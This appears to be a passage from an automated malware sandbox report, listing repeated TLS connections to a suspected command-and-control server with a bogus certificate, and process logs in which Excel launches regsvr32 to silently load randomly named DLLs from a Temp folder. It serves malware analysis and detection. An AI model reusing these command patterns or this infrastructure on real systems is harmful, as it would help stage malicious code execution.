                Jan 13, 2021 16:40:43.006299019 CET221.126.244.72443192.168.2.2249277CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:44.921502113 CET221.126.244.72443192.168.2.2249278CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:47.956825972 CET221.126.244.72443192.168.2.2249283CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:49.870456934 CET221.126.244.72443192.168.2.2249284CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:52.937917948 CET221.126.244.72443192.168.2.2249289CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:54.830255985 CET221.126.244.72443192.168.2.2249290CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:58.046722889 CET221.126.244.72443192.168.2.2249295CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:59.820720911 CET221.126.244.72443192.168.2.2249296CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:03.014342070 CET221.126.244.72443192.168.2.2249301CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:04.848007917 CET221.126.244.72443192.168.2.2249302CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:07.996817112 CET221.126.244.72443192.168.2.2249307CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:09.845252037 CET221.126.244.72443192.168.2.2249308CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:41:13.039381981 CET221.126.244.72443192.168.2.2249313CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                Code Manipulations

                Statistics

                Behavior

                System Behavior

                General

                Start time:16:38:41
                Start date:13/01/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fa70000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:38:47
                Start date:13/01/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
                Imagebase:0xff0e0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:38:47
                Start date:13/01/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
                Imagebase:0xf70000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:16:38:50
                Start date:13/01/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
                Imagebase:0xff0e0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:38:50
                Start date:13/01/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
                Imagebase:0xf70000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:16:38:54
                Start date:13/01/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll.
                Imagebase:0xff0e0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis